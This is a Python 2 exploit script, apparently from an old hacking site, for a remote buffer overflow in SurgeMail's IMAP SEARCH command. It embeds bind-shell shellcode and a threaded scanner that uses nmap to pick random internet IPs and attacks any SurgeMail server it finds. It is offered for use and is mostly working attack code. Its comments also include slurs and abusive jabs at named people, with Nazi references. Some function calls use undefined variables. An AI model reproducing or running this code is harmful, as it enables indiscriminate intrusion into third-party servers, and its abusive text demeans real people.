#!/usr/bin/python
#Modified Joey Mengele's - SurgeMail 38k (SEARCH) Remote Buffer Overflow 
#Exploit to scan for random open 25,110 ports then 
#checks the banner for SurgeMail, if found, continues to exploit it...

#http://www.darkc0de.com
#d3hydr8[at]gmail[dot]com

import sys, os, struct, socket, StringIO, re, commands, time, threading

#this is imap exploit

#710 bytes, tcp port 9999 bind, borrowed from skape miller inventor of megacanvas
sc  = "\x90"
sc += "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xeb\x03\x59"
sc += "\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x49\x49\x49\x49\x49\x49\x51\x37\x5a\x6a\x66\x58\x50\x30"
sc += "\x41\x31\x42\x41\x6b\x41\x41\x76\x41\x32\x41\x41\x32\x42\x41\x30"
sc += "\x42\x41\x58\x50\x38\x41\x42\x75\x79\x79\x4b\x4c\x32\x4a\x7a\x4b"
sc += "\x42\x6d\x78\x68\x4c\x39\x4b\x4f\x4b\x4f\x4b\x4f\x75\x30\x6e\x6b"
sc += "\x42\x4c\x45\x74\x71\x34\x6c\x4b\x41\x55\x57\x4c\x4e\x6b\x33\x4c"
sc += "\x53\x35\x51\x68\x55\x51\x68\x6f\x4c\x4b\x72\x6f\x56\x78\x6e\x6b"
sc += "\x61\x4f\x77\x50\x76\x61\x38\x6b\x52\x69\x4e\x6b\x36\x54\x4e\x6b"
sc += "\x67\x71\x4a\x4e\x76\x51\x4f\x30\x6d\x49\x4e\x4c\x4d\x54\x4b\x70"
sc += "\x41\x64\x43\x37\x4b\x71\x6b\x7a\x76\x6d\x54\x41\x4f\x32\x7a\x4b"
sc += "\x6a\x54\x45\x6b\x33\x64\x56\x44\x77\x58\x34\x35\x6b\x55\x4c\x4b"
sc += "\x61\x4f\x46\x44\x55\x51\x58\x6b\x31\x76\x6c\x4b\x46\x6c\x30\x4b"
sc += "\x4e\x6b\x61\x4f\x75\x4c\x64\x41\x38\x6b\x53\x33\x54\x6c\x4c\x4b"
sc += "\x6d\x59\x50\x6c\x64\x64\x55\x4c\x30\x61\x6b\x73\x74\x71\x4b\x6b"
sc += "\x51\x74\x4c\x4b\x51\x53\x70\x30\x4c\x4b\x77\x30\x36\x6c\x4c\x4b"
sc += "\x72\x50\x35\x4c\x4e\x4d\x6c\x4b\x73\x70\x57\x78\x31\x4e\x42\x48"
sc += "\x4e\x6e\x50\x4e\x76\x6e\x5a\x4c\x30\x50\x6b\x4f\x49\x46\x75\x36"
sc += "\x56\x33\x53\x56\x75\x38\x37\x43\x34\x72\x35\x38\x74\x37\x54\x33"
sc += "\x44\x72\x63\x6f\x71\x44\x4b\x4f\x7a\x70\x42\x48\x38\x4b\x38\x6d"
sc += "\x6b\x4c\x47\x4b\x30\x50\x4b\x4f\x4e\x36\x51\x4f\x4f\x79\x4d\x35"
sc += "\x42\x46\x4b\x31\x7a\x4d\x33\x38\x57\x72\x76\x35\x61\x7a\x46\x62"
sc += "\x4b\x4f\x6e\x30\x51\x78\x4b\x69\x67\x79\x59\x65\x6c\x6d\x41\x47"
sc += "\x4b\x4f\x6e\x36\x41\x43\x56\x33\x76\x33\x52\x73\x70\x53\x51\x53"
sc += "\x70\x53\x32\x63\x32\x73\x6b\x4f\x4e\x30\x41\x76\x62\x48\x36\x47"
sc += "\x54\x4f\x41\x76\x72\x73\x4f\x79\x49\x71\x4e\x75\x31\x78\x6e\x44"
sc += "\x67\x6a\x64\x30\x4f\x37\x70\x57\x69\x6f\x6e\x36\x70\x6a\x74\x50"
sc += "\x62\x71\x73\x65\x4b\x4f\x38\x50\x62\x48\x4c\x64\x4e\x4d\x64\x6e"
sc += "\x58\x69\x62\x77\x4b\x4f\x7a\x76\x50\x53\x51\x45\x39\x6f\x58\x50"
sc += "\x71\x78\x6b\x55\x53\x79\x6f\x76\x53\x79\x36\x37\x39\x6f\x79\x46"
sc += "\x72\x70\x61\x44\x33\x64\x62\x75\x59\x6f\x48\x50\x4a\x33\x51\x78"
sc += "\x6d\x37\x71\x69\x79\x56\x71\x69\x70\x57\x6b\x4f\x6e\x36\x51\x45"
sc += "\x69\x6f\x6e\x30\x45\x36\x63\x5a\x41\x74\x35\x36\x72\x48\x30\x63"
sc += "\x50\x6d\x6f\x79\x59\x75\x63\x5a\x52\x70\x43\x69\x37\x59\x58\x4c"
sc += "\x4f\x79\x79\x77\x52\x4a\x33\x74\x4d\x59\x39\x72\x55\x61\x4f\x30"
sc += "\x7a\x53\x6d\x7a\x79\x6e\x47\x32\x76\x4d\x69\x6e\x47\x32\x34\x6c"
sc += "\x6d\x43\x6c\x4d\x72\x5a\x54\x78\x4e\x4b\x4c\x6b\x6c\x6b\x75\x38"
sc += "\x52\x52\x4b\x4e\x4e\x53\x55\x46\x79\x6f\x71\x65\x41\x54\x59\x6f"
sc += "\x4e\x36\x43\x6b\x71\x47\x51\x42\x52\x71\x62\x71\x52\x71\x51\x7a"
sc += "\x33\x31\x56\x31\x46\x31\x51\x45\x50\x51\x59\x6f\x4e\x30\x50\x68"
sc += "\x4c\x6d\x6e\x39\x53\x35\x6a\x6e\x62\x73\x49\x6f\x5a\x76\x50\x6a"
sc += "\x59\x6f\x4b\x4f\x34\x77\x59\x6f\x5a\x70\x6c\x4b\x32\x77\x39\x6c"
sc += "\x6c\x43\x4b\x74\x61\x74\x6b\x4f\x6a\x76\x50\x52\x79\x6f\x6e\x30"
sc += "\x42\x48\x7a\x4f\x6a\x6e\x59\x70\x63\x50\x42\x73\x4b\x4f\x48\x56"
sc += "\x79\x6f\x4e\x30\x66"

def title():
	print "\n\t   d3hydr8[at]gmail[dot]com SurgeScan v1.0"
	print "\t-----------------------------------------------"

class Worker(threading.Thread):
	def run(self):
		try:
			host,port = nmap()
			getban(host,port)
		except(TypeError):
			pass

def Copulate(target,port):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,port))
	return s

def Fascism(target,u,p):
	safe_readable_null = 0x71c010e4 # Safe readable, preferably null (ws2_32 on win2k3)
	safe_writable = 0x0fff7004 # Safe writable (rsaenh.dll data section on win2k3)
	pop_then_ret = 0x77e41a26 # EIP (pop, ret in kernel32 on win2k3)
	call_esp = 0x77e839b3 # Return #2, call esp in kernel32. When hit, esp points at the next 4 bytes.
	s = Copulate(target,143)
	pkt = "0001 LOGIN \""
	pkt += u
	pkt += "\" \""
	pkt += p
	pkt += "\"\r\n"
	SendPacket(s,pkt)
	pkt = "0003 SELECT \"Inbox\"\r\n"
	SendPacket(s,pkt)
	pkt = "C284 SEARCH "
	pkt += "P"*1008
	pkt += struct.pack('<L',safe_readable_null)
	pkt += "CUNT" # Word used to describe members of the infosec community.
	pkt += struct.pack('<L',pop_then_ret)
	pkt += struct.pack('<L',safe_writable)
	pkt += struct.pack('<L',call_esp)
	pkt += "A"*198 # I have boned over 198 bitches
	pkt += "\xeb\x10" # Body Mass Index of Gadi Evron, hexadecimal LOLOLOLOL
	pkt += struct.pack('<L',safe_readable_null)
	pkt += "A"*16 # Unnecessary megathropic nopsled, invented by k2, founding member of n3td3v
	pkt += sc
	pkt += " (SAVE MIN) SINCE 12-Feb-1992 NOT FROM \"Len Rose The Moderating Nazi of Full Disclosure, Original Founder of Zyklon B\"\r\n"
	print "Sending. Hold on."
	SendPacket(s,pkt)
	time.sleep(3)
	print "The service will continue functioning but cannot be exploited again until restart."
	print "Please telnet to port 9999 on it now for a rootshell."
	print "		-management"
	s.close()

def SendPacket(s,pkt):
     s.send(pkt) # comment
	
def getban(host,port):
	print "[+] Checking banner...\n"
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.settimeout(10)
		s.connect((host, port))
		time.sleep(4)
		s.send("\r\n")
		response = s.recvfrom(1024)[0]
		s.close()		
		if re.search("surgemail", response.lower()): 
			print "\n[+] Surgemail Server found:",host, port 
			print "[+] Attempting to exploit...\n"
			Fascism(target,u,p)
		else: 
			print "\n\t[-] No Match\n"
	except socket.error, msg:
		print "An error occurred:", msg
		s.close()
	
def nmap():
	
	port = ""

	nmap = StringIO.StringIO(commands.getstatusoutput('nmap -P0 -p 25,110 -iR 1 | grep -B 4 open')[1]).readlines()
	for tmp in nmap:
		if re.search("110/tcp\s+(?=open)", tmp):
			port = 110
		if re.search("25/tcp\s+(?=open)", tmp):
			port = 25
	if str(port).isdigit() == True:
		ipaddr = re.findall("\d*\.\d*\.\d*\.\d*", nmap[2])
		if len(ipaddr[0]) >= 7:
			print "\n[+] Found:",ipaddr[0],":",port,"open"
			return ipaddr[0], port
	
if len(sys.argv) != 2:
	title()
	print "\nUsage: ./surgescan.py <How many ips would you like to scan?>\n"
	sys.exit(1)

title()
print "\n[+] Scanning:",sys.argv[1],"\n"
for i in range(int(sys.argv[1])):
	print "Done:",i+1,"of",sys.argv[1] #Comment this out if needed
	work = Worker()
	work.start()
	time.sleep(3)  #Change this to make it faster